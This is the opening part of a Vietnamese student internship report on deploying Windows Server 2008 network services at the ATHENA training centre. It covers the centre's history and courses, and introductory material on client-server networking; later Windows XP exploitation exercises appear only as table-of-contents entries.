Bao cao ck update final

TRUNG TẦM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH
MẠNGQUỐC TẾ

ATHENA


BÁO CÁO THỰC TẬP
CUỐI KHÓA
NGHIÊN CỨU VÀ TRIỂN KHAI CÁC
DỊCH VỤ MẠNG TRÊN WINDOWS
SERVER 2008
Sinh viên thực hiện

: Nguyễn Đình Duy

MSSV

:

11145941

Lớp

:

NCTH5E

GVHD

: Võ Đỗ Thắng

TP. Hồ Chí Minh, Tháng 3 năm 2014.

TRUNG TÂM ĐÀO TẠO MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA

CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM

Độc lập – Tự do – Hạnh phúc

NHIỆM VỤ THỰC HIỆN KHÓA LUẬN
Họ tên SV : Nguyễn Đình Duy.
MSSV: 11145941.
Chuyên ngành: Công Nghệ Thông Tin.
Tên đề tài: Nghiên cứu triển khai các dịch vụ mạng trên Windows Server 2008.
Nội dung thực hiện:
Lý thuyết:
Nắmvững các bước thực hiện quản trị Windows Server 2008.
Có khả năng tự thiết lập một mạng máy tính, cấu hình mạng, điều chỉnh khả
năng hoạt động mạng máy tính, vận hành hệ thống mạng, giải quyết sự cố, các
phương pháp bảo vệ trước nguy cơ virus, worm, trojan, spam.
Thực hành:
Cài đặt Windows Server 2008.
Nâng cấp Stand Alone thành Domain controller.
Cài đặt Windows 7.
Join Domain cho windows 7.
Tạo user account trên AD, thiết lập policy cho phép User được quyền thay đổi
ngày giờ hệ thống.
Backup cho Domain Controller.
Quản lý dịch vụ DNS,Mail,DHCP, Web, VPN trên môi trường Local và
Internet.
Thực hiện kết nối VPN, Mail Server, Web Server trên máy chủ ảo VPS.
Bảo mật Windows với khai thác mã lỗi trên Windows Xp
(MS10_042,MS12_004,MS12_027 và lỗi Adobe Reader9.X)
Thời gian thực hiện: 16/12/2013 đến 10/3/2014.
Chữ ký của SV:

TP.HCM, Ngày 3 tháng 3 năm 2014.
GIÁM ĐỐC TRUNG TÂM
(Ký và ghi rõ họ tên)

GIẢNG VIÊN HƯỚNG DẪN
(Ký và ghi rõ họ tên)

LỜI CẢM ƠN
Trên thực tế không có sự thành công nào mà không gắn liền với những sự hỗ
trợ, giúp đỡ dù ít hay nhiều, dù trực tiếp hay gián tiếp của người khác. Trong
suốt thời gian từ khi bắt đầu học tập ở giảng đường đến nay, em đã nhận được
rất nhiều sự quan tâm, giúp đỡ của quý Thầy Cô, gia đình và bạn bè. Với lời
biết ơn sâu sắc nhất, em xin gửi đến quý Thầy Cô ở Khoa Công Nghệ Thông
Tin - Trường Đại Học Công Nghiệp Thành Phố Hồ Chí Minh đã cùng với tri
thức và tâm huyết của mình để truyền đạt vốn kiến thức quý báu cho chúng
em trong suốt thời gian học tập tại trường. Và đặc biệt, trong học kỳ này Khoa
đã tổ chức cho chúng em thực tập và được tiếp cận với môn học mà theo em là
rất hữu ích đối với sinh viên ngành Công Nghệ Thông Tin.
Em xin chân thành cảm ơn Thầy Võ Đỗ Thắng đã tận tâm hướng dẫn chúng
em qua từng buổi thực tập tại Trung Tâm ATHENA cũng như những buổi nói
chuyện, thảo luận. Nếu không có những lời hướng dẫn, dạy bảo của thầy thầy
thì em nghĩ bài báo cáo này của em rất khó có thể hoàn thiện được. Một lần
nữa, em xin chân thành cảm ơn thầy.
Bài báo cáo được thực hiện trong khoảng thời gian gần 3 tháng. Bước đầu đi
vào thực tế, tìm hiểu, kiến thức của em còn hạn chế và còn nhiều bỡ ngỡ. Do
vậy, không tránh khỏi những thiếu sót là điều chắc chắn, em rất mong nhận
được những ý kiến đóng góp quý báu của quý Thầy Cô và các bạn học cùng
lớp để kiến thức của em trong lĩnh vực này được hoàn thiện hơn.
Sau cùng, em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin
và Thầy Võ Đỗ Thắng thật dồi dào sức khỏe, niềm tin để tiếp tục thực hiện sứ
mệnh cao đẹp của mình là truyền đạt kiến thức cho thế hệ mai sau.
Trân trọng.

TP.HCM, Ngày 3 - 3- 2014
Sinh viênthực hiện
NguyễnĐình Duy

Mụ c Lụ c
Chương I.

Công việc thực tập: ........................................................................1

1.1
Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị
Mạng và An Ninh Mạng Quốc Tế ATHENA.................................................1
1.1.1

Trụ sở và các chi nhánh: ................................................................2

1.1.1.1

Trụ sở chính: ...........................................................................2

1.1.1.2

Cơ sở 2_Tại TP Hồ Chí Minh: ................................................2

1.1.2

Quá trình hình thành và phát triển của trung tâm: .........................2

1.1.3

Cơ cấu tổ chức: ..............................................................................4

1.1.4

Các sản phẩm, giải pháp: ...............................................................4

1.1.4.1

Các khóa học dài hạn: .............................................................4

1.1.4.2

Các khóa học ngắn hạn: ..........................................................5

1.1.4.2.1 Khóa Quản trị mạng : .........................................................5
1.1.4.2.2 Khóa thiết kế web và bảo mật mạng ..................................5
1.1.4.3

Các sản phẩm khác ..................................................................5

1.1.4.4

Cơ sở hạ tầng ...........................................................................5

1.1.4.5

Các dịch vụ hỗ trợ: ..................................................................6

1.1.5

Khách hàng.....................................................................................6

1.1.6

Đối tác ............................................................................................6

Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung
cấp nhân sự CNTT, .................................................................................6
1.2

Các nhiệm vụ và dịch vụ của bộ phận thực tập ...................................6

1.3

Công việc và nhiệm vụ được phân công .............................................6

1.4

Thời gian thực tập ................................................................................7

Chương II.

Nội dung thực tập .......................................................................8

2.1

Nhiệm vụ được giao ............................................................................8

2.2

Kiến thức tìm hiểu ...............................................................................8

2.2.1

Giải pháp mạng doanh nghiệp .......................................................8

2.2.1.1

Giới thiệu về mạng doanh nghiệp ...........................................8

2.2.1.2

Các thành phần công nghệ trong mạng doanh nghiệp ............8

2.2.2

Windows Server 2008 ....................................................................9

2.2.2.1
2.2.2.2
2.3

Giới thiệu về mô hình Client-Server ......................................9
Giới thiệu về Windows Server 2008 .....................................12

Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức ..15

2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo
VMWare ....................................................................................................15
2.3.1.1.1 Cài đặt và cấu hình máy chủ Windows Server 2008 .......16
2.3.1.1.2 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
25
2.3.1.1.3 Cài đặt dịch vụ DNS ........................................................35
2.3.1.1.4 Dịch Vụ DHCP ................................................................46
2.3.1.1.5 Cấu hình Web Server IIS. ................................................58
2.3.1.1.6 Mail Server .......................................................................66
2.3.1.1.7 Kết nối VPN .....................................................................78
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS
(Virtual private server) ..............................................................................98
2.3.2.1

Mail Server trên máy chủ ảo VPS. ......................................100

2.3.2.2

Kết Nối VPN thông qua máy chủ ảo VPS. .........................112

2.3.2.3

Cài đặt và cấu hình Web Server trên VPS. .........................132

2.3.3

Bảo mật Windows ......................................................................143

2.3.3.1
2.3.3.2

Khai thác lỗ hổng bảo mật Win XP mã lỗi MS12_004.......148

2.3.3.3

Khai thác lỗ hổng trên Win XP với lỗi Adobe Reader 9.X .155

2.3.3.4
2.4

Khai thác lỗ hổng trên Windows XP với mã lỗi MS10_042
143

Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027 .......159

Các kết quả đạt được .......................................................................165

2.4.1

Kinh nghiệm thực tế ...................................................................165

2.4.2

Hoàn thiện bản thân ...................................................................165

2.4.3

Các kiến thức được lĩnh hội .......................................................165

Chương III.

Kết Luận .................................................................................166

Chương IV.

Tài liệu tham khảo ..................................................................168

LỜI MỞ ĐẦU
Ngày nay với sự phát triển của khoa học kỹ thuật thì máy tính trở nên
phổ biến với mọi người. Chúng mang lại cho con người khả năng to lớn và
làm những công việc phi thường: tính toán nhanh và chính xác các bài toán
phức tạp, điều khiển tự động, giải trí… Máy tính ra đời không chỉ hỗ trợ trong
sản xuất mà còn trong việc học tập và làm góp phần giải phóng sức lao động.
Máy tính điện tử là một phát minh, thành tựu to lớn cho sự phát triển của nhân
loại góp phần thúc đẩy mạnh mẽ tiến bộ khoa học và kỹ thuật nói riêng cũng
như nhân loại nói chung.
Bên cạnh sự phát triển chóng mặt của máy tính trong thời buổi công
nghệ thông tin thì các ứng dụng, dịch vụ mạng là nền tản không thể tách rời.
Sức mạnh máy tính có thể nhân lên gấp nhiều lần khi được kết nối thành mạng
máy tính. Là cơ sở hạ tần cho phép trao đổi thông tin, truyền tải dữ liệu từ xa
nhằm rút ngắn khoảng cách. Với mạng máy tính toàn cầu chúng ta dễ dàng
tiếp cận với sự phát triển của thế giới trong đó có sự phát triển gần nhất của
Windows Server là Windows Server 2000 và Windows Server 2003 và tiếp
đến là Windows Server 2008 hỗ trợ tốt các dịch vụ mạng cần thiết trên Server,
việc cải tiến không ngừng giúp nâng cao tính ổn định và an toàn hơn cho
Windows Server 2008 hoạt động một cách trơn tru.
Hiện nay quá trình công nghiệp hóa hiện đại hóa đất nước là một chủ
trương hàng đầu của nhà nước. Mạng máy tính trở thành mục tiêu nghiên cứu
và phát triển. Cốt lõi là ngành công nghệ thông tin bao gồm nhiều lĩnh vực từ
kiến trúc mạng đến nguyên lý thiết kế, cài đặt mô hình ứng dụng v.v… Mạng
viễn thông nói chung và mạng máy tính trên nền tảng Windows Server 2008
nói riêng là công cụ hũu dụng không thể thiếu trong bộ máy nhà nước, trường
học, doanh nghiệp… Nó đóng vai trò cầu nối trao đổi thông tin giữa các chính
phủ, tổ chức xã hội và mọi người với nhau.
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ
trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều
kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp
em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu
về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông
minh cho mọi người sử dụng.
Tuy đã có nhiều cố gắng song không thể tránh những khuyết điểm, sai
sót vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý
Thầy Cô, bạn bè, bạn đọc, người thân để em có thể ngày một hoàn thiện bản
thân
mình
hơn.
Xin
chân
thành
cảm
ơn!

Chương I.

Công việc thực tập:

1.1 Giới thiệu doanh nghiệp thực tập – Trung Tâm Đào Tạo Quản Trị Mạng
và An Ninh Mạng Quốc Tế ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế
ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt
Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA),
được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở
Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên

công

ty

viết

bằng

tiếng

nước

ngoài: ATHENA

ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với
quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước
nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
 Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo
các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle,
Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương
trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ
Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ,
tổ chức tài chính..Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ
thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình
độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu.
 Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động
sản xuất kinh doanh.
 Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển
cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
 Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp
xảy ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an
ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc
Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các
tỉnh,…
1
SVTT: Nguyễn Đình Duy

Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao
đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ
Chí Minh, HọcViệnAn Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...
1.1.1 Trụ sở và các chi nhánh:
1.1.1.1 Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
1.1.1.2 Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
1.1.2 Quá trình hình thành và phát triển của trung tâm:
Một nhóm các thành viên là những doanh nhân tài năng và thành công
trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc
đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ
chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của
ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực lượng
lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính
cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn
tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS,
Phó Tổng công ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu
máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu
máy tính miền Nam.


o
o
o
o

2



Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển

mình. Trung tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh
nghiệp nhằm cài đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên
của các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ
năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học
sinh_sinh viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của
Trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng
nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, các
doanh nghiệp, cá nhân nói riêng.Năm 2004, công ty mở rộng hoạt động cung
cấp giải pháp, dịch vụ cho khu vực miền Trung thông qua việc thành lập văn
phòng đại diện tại Đà Nẵng.


Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena

mở ra thêm một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục
tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp
các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng
thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội
ngũ nhân lực công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm
giàu thêm đội ngũ giảng viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh
mạng mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho
Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa
Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ
thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động
không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến
khó khăn khác. Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục
sứ mạng góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng
mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung
tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở
ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một
tinh thần thép đãgiúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung
tâm đứng vững trong thời kì khủng hoảng.


3

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến
lược. Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại
quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong
những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên
kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào
tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước
thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.


1.1.3 Cơ cấu tổ chức:
Hình 1.1 Sơ đồ tổ chức công ty

1.1.4 Các sản phẩm, giải pháp:
1.1.4.1 Các khóa học dài hạn:
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
-

Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.

-

Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator.
4

1.1.4.2 Các khóa học ngắn hạn:
1.1.4.2.1
Khóa Quản trị mạng :
-

Quản trị mạng Microsoft căn bản ACBN

-

Phần cứng máy tính, laptop, server

-

Quản trị hệ thống mạng Microsoft MCSA Security.

-

Quản trị mạng Microsoft nâng cao MCSE

-

Quản trị window Vista

-

Quản trị hệ thống Window Server 2008, 2012

-

Lớp Master Exchange Mail Server

-

Quản trị mạng quốc tế Cissco CCNA

-

Quản trị hệ thống mạng Linux 1 và Linux 2.

-

1.1.4.2.2
Khóa thiết kế web và bảo mật mạng
Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart

-

Lập trình web với Php và MySQL

-

Bảo mật mạng quốc tế ACNS

-

Hacker mũ trắng

-

Athena Mastering Firewall Security

-

Bảo mật website.

1.1.4.3 Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
-

Chuyên đề thực hành bảo mật mạng Wi_Fi

-

Chuyên đề Ghost qua mạng

-

Chuyên đề xây dựng và quản trị diễn đàn

-

Chuyên đề bảo mật dữ liệu phòng chống nội gián

-

Chuyên đề quản lý tài sản công nghệ thông tin

- Chuyên đề kỹ năng thương mại điện tử.
1.1.4.4 Cơ sở hạ tầng
-

Thiết bị đầy đủ và hiện đại.

-

Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
5

-

Phòng máy rộng rãi, thoáng mát.

1.1.4.5 Các dịch vụ hỗ trợ:
-

Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn

-

Giới thiệu việc làm cho mọi học viên

-

Thực tập có lương cho học viên khá giỏi

-

Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới
hạn thời gian

-

Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng

-

Hỗ trợ thi Chứng chỉ Quốc tế

1.1.5 Khách hàng
-

Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENAlà các bạn học sinh, sinh viên và các cán
bộ công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

1.1.6 Đối tác
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân
sự CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho
các đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính...
1.2 Các nhiệm vụ và dịch vụ của bộ phận thực tập
Bộ phận thực tập : Bộ phận triển khai kỹ thuật.
Nhiệm vụ và dịch vụ:
 Triển khai lắp đặt hệ thống mạng.
 Bảo trì hệ thống mạng.
 Tư vấn hỗ trợ quản trị hệ thống mạng.
1.3 Công việc và nhiệm vụ được phân công


Nghiên cứu các dịch vụ mạng trên Windows Server 2008.

6



Triển khai các dịch vụ mạng trên Windows Server 2008.



Yêu cầu nhiệm vụ: Có kiến thức tốt về Network, System, Security.

1.4 Thời gian thực tập
Từ ngày 16/12/2013 đến ngày 10/3/2013.

7

Chương II.

Nội dung thực tập

2.1 Nhiệm vụ được giao


Nghiên cứu các dịch vụ mạng trên Windows Server 2008



Triển khai các dịch vụ mạng trên Windows Server 2008

2.2 Kiến thức tìm hiểu
2.2.1 Giải pháp mạng doanh nghiệp
2.2.1.1 Giới thiệu về mạng doanh nghiệp
Hệ thống mạng của doanh nghiệp đơn giản hay phức tạp là tùy theo quy mô và
loại hình của doanh nghiệp. Ngày nay, các nhà cung ứng đã đưa ra rất nhiều
sự chọn lựa cho doanh nghiệp như cho phép doanh nghiệp tự trang bị, tự quản
lý hoặc sử dụng dịch vụ. Những doanh nghiệp lớn với hàng ngàn máy tính
cũng có những giải pháp quản lý đặc thù kết hợp cả phần cứng và phần mềm.
Hầu hết các doanh nghiệp đều có nhu cầu sử dụng các ứng dụng công nghệ
thông tin (CNTT) ở những mức độ khác nhau. Do vậy, họ sẽ có những nhu
cầu khác nhau về quản trị hệ thống mạng (network) của doanh nghiệp. Một hệ
thống được kiểm soát tốt sẽ làm giảm đáng kể chi phí hoạt động, nâng cao
hiệu quả cũng như độ tin cậy của hệ thống.
2.2.1.2 Các thành phần công nghệ trong mạng doanh nghiệp
Tùy vào qui mô lớn hay nhỏ của doanh nghiệp mà ta sẽ có những giải pháp
công nghệ và thiết kế sao cho phù hợp nhất.
Hiện nay, hầu hết các ứng dụng mới đều yêu cầu rất nhiều tài nguyên của hệ
thống và băng thông mạng, cũng như các yêu cầu về điều khiển, giám sát
mạng. Vậy làm thế nào để một doanh nghiệp vừa và nhỏ, với một số vốn đầu
tư ban đầu hạn chế, có thể tiếp cận được với các công nghệ hiện đại, bắt kịp sự
phát triển của thế giới.

8

2.2.2 Windows Server 2008
2.2.2.1 Giới thiệu về mô hình Client-Server
Điều đáng ngạc nhiên là nhiều công ty ngày nay vẫn không quan tâm đến việc
thực hiện một mạng lưới client/server. Thay vào đó họ chỉ tiếp tục thêm vào
các máy trạm để thực hiện mô hình mạng peer-to-peer. Mạng peer-to-peer
không cung cấp cho bạn nhiều cách bảo mật và chia sẽ tài nguyên. Vì vậy,
không có gì ngạc nhiên khi họ thường có vấn đề với việc truy cập vào máy
trạm, bị mất dữ liệu do virus, spyware hay phải trải nghiệm việc internet bị
gián đoạn. Máy tính nối mạng theo mô hình peer-to-peer là đủ khi bạn chỉ có
một vài người dung trên mạng, nhưng khi có nhiều hơn 5 hoặc 6 người sử
dụng trên mạng của bạn, bạn thực sự phải xem xét đầu tư một máy chủ mạng.
Vậy lợi ích của mô hình Client-Server cụ thể là gì?
-

Tập tin và an ninh mạng: Vai trò quan trọng nhất của một máy chủ tập tin là
an ninh mạng mà nó cung cấp. Bằng cách tạo ra các tài khoản người dùng cá
nhân và nhóm, có thể cấp quyền cho nhóm và cá nhân khai thác dữ liệu được
lưu trữ trên mạng, ngăn chặn người sử dụng trái phép truy cập tài liệu mà họ
không nên xem. Ví dụ, trong Folder chung thì group ketoan và group nhansu
cóquyền truy cập ủa nhân viên…

9

Hình 1.2 Cấu hình NTFS Permission
-

Tăng độ tin cậy, giảm sự gián đoạn công việc: Nhiều máy chủ được trang bị
nguồn điện dự phòng. Với một nguồn cung cấp năng lượng thứ cấp chạy song
song, sự mất mát của một trong những nguồn cung cấp điện không ảnh hưởng
đến hoạt động hệ thống bình thường. Cũng vậy với hệ thống lưu trữ của máy
chủ. Không giống như một máy tính để bàn trung bình có sử dụng một ổ cứng
duy nhất, một máy chủ sẽ thường sử dụng nhiều ổ đĩa cứng làm việc trong một
RAID cấu hình để ngăn ngừa mất dữ liệu hoặc một sự gián đoạn trong quy
trình làm việc. Ngoài ra, nhiều máy chủ cũng được trang bị ổ đĩa cứng hot
swappable và nguồn cung cấp điện. Các thành phần này có thể thay thế nóng
cho phép bạn thay thế phần cứng bị lỗi mà không gián đoạn toàn bộ văn
phòng. Ngoài ra, kể từ khi tất cả các dữ liệu nhân viên đang được lưu trữ trên
mạng, nếu máy trạm của người dùng không giữa ngày làm việc, nhân viên có
thể truy cập các tập tin tương tự từ máy trạm khác.
10

-

Tập trung lưu trữ dữ liệu và tài nguyên chia sẻ: Với một máy chủ mạng, tất
cả người dùng trên mạng có thể sử dụng các tài nguyên mạng khác nhau ngay
từ bàn làm việc, tăng hiệu quả. Một số trong những nguồn tài nguyên bao
gồm:

o Tập trung lưu trữ dữ liệu ( RAID Array )
o Network Attached Storage (NAS) thiết bị
o Tháp đĩa CD / DVD
o Máy in và máy chủ Fax
-

Quản lý virus : Một trong những mối đe dọa lớn nhất đối với mạng của bạn là
khả năng lây nhiễm từ virus, phần mềm gián điệp và thư rác. Vì vậy, có tốt,
cập nhật, phần mềm chống virus được cài đặt trên hệ thống của bạn là một
điều cần thiết. Trong một văn phòng của 10 người hoặc ít hơn, hệ thống có thể
được duy trì riêng. Bất cứ điều gì nhiều hơn thế, tuy nhiên, có thể trở thành
một gánh nặng thực sự. Trong những trường hợp này, một gói phần mềm
chống virus kết hợp máy trạm và bảo vệ chống virus máy chủ vào một giải
pháp duy nhất có ý nghĩa hơn.

-

Sao lưu tập trung: Tất cả các doanh nghiệp nên sao lưu dữ liệu của họ một
cách thường xuyên. Bởi có tất cả các công ty của bạn và dữ liệu nhân viên
được lưu trữ tại một địa điểm, bản sao lưu có thể được thực hiện đáng tin cậy
và nhanh chóng. Vì vậy, bạn sẽ không bao giờ cần phải lo lắng về những dữ
liệu được lưu trữ trên những gì máy trạm như bạn làm trong một mạng peerto-peer. Ngày nay, hầu hết các loại phương tiện truyền thông có thể được sử
dụng cho mục đích sao lưu. Ngoài các ổ đĩa truyền thống băng, đĩa CD, DVD,
lưu trữ và thậm chí loại bỏ Network Attached Storage (NAS) thiết bị này là
chấp nhận được. Sự lựa chọn của bạn của phương tiện truyền thông sẽ phụ
thuộc vào yêu cầu cụ thể của bạn sao lưu. Tùy thuộc vào ngân sách của bạn và
nhu cầu lưu giữ dữ liệu của bạn, bất kỳ trong số này sẽ là một giải pháp chấp
nhận được. Hãy chắc chắn rằng bạn có ít nhất một bản sao lưu hàng tuần theo
lịch trình, mặc dù hàng ngày sẽ tốt hơn.
11

2.2.2.2 Giới thiệu về Windows Server 2008
Window Server 2008 là hệ điều hành Windows Server tân tiến nhất cho tới
thời điểm này, được thiết kế nhằm tăng sức mạnh cho các mạng, ứng dụng và
dịch vụ Web thế hệ mới. Với Windows Server 2008, bạn có thể phát triển,
cung cấp và quản lý các trải nghiệm người dùng và ứng dụng phong phú, đem
tới một hạ tầng mạng có tính bảo mật cao, và tăng cường hiệu quả về mặt
công nghệ và giá trị trong phạm vi tổ chức của mình.
Windows Server 2008 kế thừa những thành công và thế mạnh của các hệ điều
hành Windows Server thế hệ trước, đồng thời đem tới tính năng mới có giá trị
và những cải tiến mạnh mẽ cho hệ điều hành cơ sở này. Công cụ Web mới,
công nghệ ảo hóa, tính bảo mật tăng cường và các tiện ích quản lý giúp tiết
kiệm thời gian, giảm bớt các chi phí, và đem tới một nền tảng vững chắc cho
hạ tầng Công nghệ Thông tin (CNTT) của bạn.
Nền tảng chắc chắn dành cho doanh nghiệp
Windows Server 2008 đem tới một nền tảng chắc chắn đáp ứng tất cả các yêu
cầu về ứng dụng và chế độ làm việc cho máy chủ, đồng thời dễ triển khai và
quản lý. Thành phần mới Server Manager cung cấp một console quản lý hợp
nhất, đơn giản hóa và sắp xếp một cách hợp lý việc cài đặt, cấu hình và quản
lý liên tục cho máy chủ. Windows PowerShell, một shell mới kiểu dòng lệnh,
giúp quản trị viên tự động hóa các tác vụ thường trình về quản trị hệ thống
trên nhiều máy chủ. Windows Deployment Services đem tới một phương tiện
bảo mật cao, đơn giản hóa để nhanh chóng triển khai hệ điều hành này qua các
bước cài đặt trên nền mạng.Thêm vào đó, các wizard Failover Clustering của
Windows Server 2008, và việc hỗ trợ đầy đủ cho Giao thức Internet phiên bản
6 (gọi tắt là IPv6) cộng với khả năng quản lý hợp nhất Network Load
Balancing khiến dễ dàng triển khai với tính sẵn có cao, thậm chí bởi những
người có hiểu biết chung nhất về CNTT.
